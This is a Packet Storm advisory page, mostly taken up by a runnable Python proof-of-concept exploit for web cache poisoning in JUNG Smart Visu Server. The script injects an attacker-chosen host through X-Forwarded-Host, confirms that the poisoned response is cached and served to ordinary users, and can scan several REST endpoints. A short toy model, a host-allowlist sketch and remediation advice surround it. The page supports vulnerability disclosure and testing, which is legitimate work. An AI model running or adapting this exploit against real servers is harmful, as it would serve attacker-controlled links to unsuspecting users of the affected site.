📄 JUNG Smart Visu Server Cache Poisoning

🗓️ 16 Feb 2026 00:00:00 · Reported by indoushka · Type: packetstorm · 🔗 packetstorm.news · 👁 134 Views

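This PoC detects and validates web cache poisoning in JUNG Smart Visu Server: it inspects cache-related response headers, sends a request carrying a crafted X-Forwarded-Host header, and then rechecks with a normal request to confirm that the poisoned response was cached.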
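
The condition being validated can be illustrated offline with a toy model. The sketch below is not the vendor's implementation: `origin`, `ToyCache`, and the host names `visu.local` and `attacker.example` are hypothetical, and the only assumption is that the cache keys entries on the path while the origin builds links from X-Forwarded-Host.

```python
from typing import Dict, Optional, Tuple


def origin(path: str, forwarded_host: Optional[str]) -> str:
    """Hypothetical origin that builds links from X-Forwarded-Host when present."""
    host = forwarded_host or "visu.local"
    return f'{{"link": "http://{host}{path}"}}'


class ToyCache:
    """Toy cache keyed only on the path; X-Forwarded-Host is not part of the key."""

    def __init__(self) -> None:
        self.store: Dict[str, str] = {}

    def get(self, path: str, forwarded_host: Optional[str] = None) -> Tuple[str, bool]:
        if path in self.store:
            return self.store[path], True   # cache hit: the header is never consulted
        body = origin(path, forwarded_host)
        self.store[path] = body             # stored under the path alone
        return body, False


cache = ToyCache()
# First request carries the unkeyed header and populates the cache.
first, hit1 = cache.get("/rest/items", forwarded_host="attacker.example")
# Second request is a normal one without the header (the "recheck").
second, hit2 = cache.get("/rest/items")
poisoned = hit2 and "attacker.example" in second
```

In this model the recheck is what separates plain reflection from poisoning: reflection only shows up in `first`, while poisoning requires the injected host to appear in `second` as well.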

Code
=============================================================================================================================================
    | # Title     : JUNG Smart Visu Server - Advanced Cache Poisoning Exploit                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://www.jung-group.com/en-DE                                                                                            |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/215522/ & ZSL-2026-5970
    
    [+] Summary    : This Python script is a PoC designed to detect and validate a web cache poisoning vulnerability in JUNG Smart Visu Server.
    
    The tool performs a structured and reliable validation process instead of relying on simple reflection checks. It:
    
    - Detects the presence of a caching layer (CDN, proxy, reverse proxy)
    - Analyzes cache-related HTTP headers (e.g., Age, X-Cache, CF-Cache-Status)
    - Determines whether query strings or specific headers affect the cache key
    - Attempts cache poisoning using the X-Forwarded-Host header
    - Verifies the vulnerability by issuing a second normal request to confirm cache persistence
    - Collects evidence such as poisoned responses and affected links
    
    If successful, the script shows that attacker-supplied input can be stored in the cache and served to normal users, which confirms the cache poisoning condition.
    
    The PoC supports both single-endpoint testing and comprehensive multi-endpoint scanning modes.
    
    [+] POC :
    
    #!/usr/bin/env python3
    
    import requests
    import sys
    import time
    import hashlib
    import urllib3
    from urllib.parse import urlparse, parse_qs
    from typing import Dict, List, Optional, Tuple
    import json
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    class JUNGCachePoisoningExploit:
        def __init__(self, target_url: str, malicious_host: str, verbose: bool = True):
            self.target_url = target_url.rstrip('/')
            self.malicious_host = malicious_host
            self.verbose = verbose
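            self.session = requests.Session()
            self.session.verify = False
            # requests ignores a `timeout` attribute set on a Session, so bind a
            # default 10-second timeout to every request made through it instead.
            _send = self.session.request
            self.session.request = lambda method, url, **kw: _send(method, url, **{"timeout": 10, **kw})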
            self.cache_headers = [
                'Cache-Control', 'Age', 'X-Cache', 'X-Cache-Lookup',
                'CF-Cache-Status', 'X-Varnish', 'Via', 'X-Proxy-Cache',
                'X-Cache-Status', 'Server-Timing', 'X-Drupal-Cache',
                'X-Nginx-Cache', 'X-Accel-Expires'
            ]
            
        def log(self, message: str, level: str = "INFO"):
            """Logging with colors"""
            colors = {
                "INFO": "\033[94m[*]\033[0m",
                "SUCCESS": "\033[92m[+]\033[0m",
                "WARNING": "\033[93m[!]\033[0m",
                "ERROR": "\033[91m[-]\033[0m",
                "VULN": "\033[91m[OK]\033[0m"
            }
            if self.verbose or level in ["ERROR", "VULN", "WARNING"]:
                print(f"{colors.get(level, '[*]')} {message}")
        
        def analyze_cache_headers(self, headers: Dict) -> Dict:
            """Analyze cache-related headers"""
            cache_info = {
                'is_cached': False,
                'cache_headers': {},
                'cache_control': {},
                'age': None,
                'cache_hit': False
            }
    
            for header in self.cache_headers:
                if header.lower() in {h.lower() for h in headers}:
                    actual_header = next(h for h in headers if h.lower() == header.lower())
                    cache_info['cache_headers'][actual_header] = headers[actual_header]
    
            if 'Cache-Control' in headers:
                cache_directives = headers['Cache-Control'].split(',')
                for directive in cache_directives:
                    d = directive.strip().lower()
                    if '=' in d:
                        key, value = d.split('=', 1)
                        cache_info['cache_control'][key] = value
                    else:
                        cache_info['cache_control'][d] = True
    
            if 'Age' in headers:
                try:
                    cache_info['age'] = int(headers['Age'])
                    cache_info['is_cached'] = True
                    cache_info['cache_hit'] = cache_info['age'] > 0
                except (ValueError, TypeError):
                    # Age header present but not a valid integer; ignore it
                    pass
            for header in ['X-Cache', 'X-Cache-Lookup', 'CF-Cache-Status']:
                if header in headers:
                    value = headers[header].lower()
                    if 'hit' in value:
                        cache_info['cache_hit'] = True
                        cache_info['is_cached'] = True
                    cache_info['cache_headers'][header] = headers[header]
            
            return cache_info
        
        def detect_caching_layer(self) -> Dict:
            """Detect if there's a caching layer (proxy, CDN, etc.)"""
            cache_layer = {
                'has_cache': False,
                'cache_type': None,
                'cache_details': {}
            }
    
            test_param = f"test_{int(time.time())}"
            url = f"{self.target_url}/rest/items?{test_param}=1"
            
            try:
    
                response1 = self.session.get(url)
                cache1 = self.analyze_cache_headers(response1.headers)
    
                time.sleep(0.5)
                response2 = self.session.get(url)
                cache2 = self.analyze_cache_headers(response2.headers)
    
                if cache2.get('cache_hit') or (cache2.get('age') and cache2['age'] > 0):
                    cache_layer['has_cache'] = True
                    cache_layer['cache_details']['first_request'] = cache1
                    cache_layer['cache_details']['second_request'] = cache2
    
                    if 'X-Cache' in response2.headers:
                        cache_layer['cache_type'] = 'Generic Proxy Cache'
                    if 'CF-Cache-Status' in response2.headers:
                        cache_layer['cache_type'] = 'CloudFlare CDN'
                    if 'X-Varnish' in response2.headers:
                        cache_layer['cache_type'] = 'Varnish Cache'
                    if 'Via' in response2.headers and 'nginx' in response2.headers.get('Via', '').lower():
                        cache_layer['cache_type'] = 'Nginx Proxy'
                        
                    self.log(f"Detected caching layer: {cache_layer['cache_type'] or 'Unknown'}", "SUCCESS")
                else:
                    self.log("No caching layer detected", "WARNING")
                    
            except Exception as e:
                self.log(f"Error detecting cache: {str(e)}", "ERROR")
                
            return cache_layer
        
        def test_cache_key_variations(self, endpoint: str) -> Dict:
            """Test what variations affect the cache key"""
            cache_key_info = {
                'query_string_matters': False,
                'headers_matter': {},
                'vary_headers': []
            }
            
            base_url = f"{self.target_url}{endpoint}"
            test_payload = f"test_{hash(time.time())}"
            
            try:
                url1 = f"{base_url}?test1={test_payload}"
                url2 = f"{base_url}?test2={test_payload}"
                
                response1 = self.session.get(url1)
                response2 = self.session.get(url2)
    
                if hashlib.md5(response1.content).digest() != hashlib.md5(response2.content).digest():
                    cache_key_info['query_string_matters'] = True
    
                if 'Vary' in response1.headers:
                    vary_headers = [h.strip() for h in response1.headers['Vary'].split(',')]
                    cache_key_info['vary_headers'] = vary_headers
    
                    for vary_header in vary_headers:
                        if vary_header.lower() in ['cookie', 'authorization', 'user-agent']:
    
                            headers1 = {vary_header: 'test1'}
                            headers2 = {vary_header: 'test2'}
                            
                            resp1 = self.session.get(url1, headers=headers1)
                            resp2 = self.session.get(url1, headers=headers2)
                            
                            if hashlib.md5(resp1.content).digest() != hashlib.md5(resp2.content).digest():
                                cache_key_info['headers_matter'][vary_header] = True
                                
            except Exception as e:
                self.log(f"Error testing cache key: {str(e)}", "ERROR")
                
            return cache_key_info
        
        def attempt_cache_poisoning(self, endpoint: str = "/rest/items") -> Tuple[bool, Dict]:
            """
            Attempt to poison the cache and verify with a second request
            """
            self.log(f"Attempting cache poisoning on {endpoint}")
    
            cache_layer = self.detect_caching_layer()
            if not cache_layer['has_cache']:
                self.log("No cache detected, cannot perform cache poisoning", "WARNING")
                return False, {'error': 'no_cache'}
    
            cache_key_info = self.test_cache_key_variations(endpoint)
            self.log(f"Query string affects cache key: {cache_key_info['query_string_matters']}")
            poison_param = "poison_test"
            if cache_key_info['query_string_matters']:
                poison_url = f"{self.target_url}{endpoint}?{poison_param}=1"
            else:
                poison_url = f"{self.target_url}{endpoint}"
    
            headers = {
                "User-Agent": "Mozilla/5.0 (Poisoning-Test)",
                "X-Forwarded-Host": self.malicious_host,
                "Accept": "application/json",
                "Cache-Control": "no-cache"  
            }
            
            self.log(f"Sending poisoned request with X-Forwarded-Host: {self.malicious_host}")
            poison_response = self.session.get(poison_url, headers=headers)
    
            if self.malicious_host not in poison_response.text:
                self.log("Malicious host not reflected in response", "ERROR")
                return False, {'error': 'no_reflection'}
            
            self.log("Malicious host reflected in response", "SUCCESS")
    
            self.log("Verifying cache poisoning with second request...")
            time.sleep(1)  
    
            verify_headers = {
                "User-Agent": "Mozilla/5.0 (Normal-User)",
                "Accept": "application/json"
            }
            
            verify_response = self.session.get(poison_url, headers=verify_headers)
    
            if self.malicious_host in verify_response.text:
                self.log("CACHE POISONING CONFIRMED!", "VULN")
                self.log(f"Malicious host '{self.malicious_host}' served to normal user", "VULN")
    
                cache_info = self.analyze_cache_headers(verify_response.headers)
                if cache_info['cache_hit']:
                    self.log("Response came from cache (cache hit)", "SUCCESS")
    
                evidence = {
                    'poisoned_url': poison_url,
                    'malicious_host': self.malicious_host,
                    'cache_layer': cache_layer,
                    'cache_headers': cache_info,
                    'poisoned_response_sample': poison_response.text[:500] + "...",
                    'verified_response_sample': verify_response.text[:500] + "..."
                }
    
                try:
                    data = verify_response.json()
                    if isinstance(data, list):
                        poisoned_links = [item.get('link') for item in data if 'link' in item and self.malicious_host in item.get('link', '')]
                        evidence['poisoned_links'] = poisoned_links[:5]
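                except (ValueError, AttributeError, TypeError):
                    # Body is not JSON, or not a list of objects with 'link' fields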
                    pass
                
                return True, evidence
            else:
                self.log("Cache poisoning failed - normal request doesn't show malicious host", "WARNING")
    
                self.log("Checking cache headers of normal request:")
                cache_info = self.analyze_cache_headers(verify_response.headers)
                for header, value in cache_info['cache_headers'].items():
                    self.log(f"  {header}: {value}")
                    
                return False, {'error': 'poisoning_failed'}
        
        def comprehensive_scan(self):
            """Scan multiple endpoints for cache poisoning vulnerability"""
            self.log("\n" + "="*60)
            self.log("Starting comprehensive cache poisoning scan", "INFO")
            self.log("="*60)
            
            endpoints = [
                "/rest/items",
                "/rest/ui",
                "/rest/configuration",
                "/rest/devices",
                "/",
                "/api/v1/items"
            ]
            
            vulnerable_endpoints = []
            
            for endpoint in endpoints:
                self.log(f"Testing endpoint: {endpoint}")
                success, result = self.attempt_cache_poisoning(endpoint)
                
                if success:
                    vulnerable_endpoints.append({
                        'endpoint': endpoint,
                        'evidence': result
                    })
                    if 'poisoned_links' in result:
                        self.log("\nPoisoned links detected:", "VULN")
                        for link in result['poisoned_links']:
                            self.log(f"   {link}", "VULN")
                
                time.sleep(2)  
            
            return vulnerable_endpoints
    
    def main():
        """Main function"""
        if len(sys.argv) < 3:
            print("Usage: python3 exploit_advanced.py <target_url> <malicious_host> [--scan] [--endpoint <path>]")
            print("Example: python3 exploit_advanced.py http://10.0.0.16:8080 attacker.com")
            print("Options:")
            print("  --scan             Perform comprehensive scan of all endpoints")
            print("  --endpoint <path>  Specify custom endpoint (default: /rest/items)")
            sys.exit(1)
        
        target = sys.argv[1]
        malicious = sys.argv[2]
        
        exploit = JUNGCachePoisoningExploit(target, malicious, verbose=True)
        
        if "--scan" in sys.argv:
            results = exploit.comprehensive_scan()
            
            print("\n" + "="*60)
            print("SCAN RESULTS")
            print("="*60)
            
            if results:
                print(f"\nFound {len(results)} vulnerable endpoints:")
                for r in results:
                    print(f"  - {r['endpoint']}")
                    if 'poisoned_links' in r['evidence']:
                        print("    Sample poisoned links:")
                        for link in r['evidence']['poisoned_links'][:3]:
                            print(f"      {link}")
            else:
                print("\nNo vulnerable endpoints found (or cache poisoning not confirmed)")
                
        else:
            endpoint = "/rest/items"
            for i, arg in enumerate(sys.argv):
                if arg == "--endpoint" and i+1 < len(sys.argv):
                    endpoint = sys.argv[i+1]
            
            success, evidence = exploit.attempt_cache_poisoning(endpoint)
            
            if success:
                print("\n" + "="*60)
                print("VULNERABLE TO CACHE POISONING")
                print("="*60)
                print(f"Target: {target}")
                print(f"Endpoint: {endpoint}")
                print(f"Malicious host: {malicious}")
                
                if 'poisoned_links' in evidence:
                    print("\nPoisoned links detected:")
                    for link in evidence['poisoned_links']:
                        print(f"  {link}")
                
                print("\n[!]  Recommendations:")
                print("    - Update JUNG Smart Visu Server")
                print("    - Validate/sanitize X-Forwarded-Host header")
                print("    - Configure proxy to strip or validate proxy headers")
                print("    - Implement host header whitelisting")
            else:
                print("\nCache poisoning was not confirmed on this target")
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================
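
The recommendations printed by the PoC (validate X-Forwarded-Host, allowlist hosts) could look roughly like the following on the server or proxy side. This is a minimal sketch under stated assumptions, not the vendor's fix: `effective_host`, its parameters, and the host names in the usage lines are hypothetical.

```python
from typing import Iterable, Mapping


def effective_host(
    headers: Mapping[str, str],
    allowed_hosts: Iterable[str],
    default_host: str,
) -> str:
    """Return the host to use when building links in a response.

    X-Forwarded-Host is honoured only when it matches the allowlist;
    anything else falls back to the configured default host.
    """
    allowed = {h.lower() for h in allowed_hosts}
    # HTTP header names are case-insensitive, so normalise them first.
    lowered = {name.lower(): value for name, value in headers.items()}
    candidate = lowered.get("x-forwarded-host", "")
    # Proxies may append several comma-separated values; consider only the first.
    candidate = candidate.split(",")[0].strip().lower()
    return candidate if candidate in allowed else default_host


# Hypothetical usage: an unknown host is rejected, a listed one is accepted.
rejected = effective_host({"X-Forwarded-Host": "attacker.example"}, ["visu.local"], "visu.local")
accepted = effective_host({"x-forwarded-host": "Panel.Local"}, ["panel.local"], "visu.local")
```

Falling back to a fixed default rather than echoing the header means a cached response cannot carry an attacker-chosen host, whether or not the cache includes the header in its key.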


16 Feb 2026 00:00 (current): Vulners AI Score 5.5, Medium risk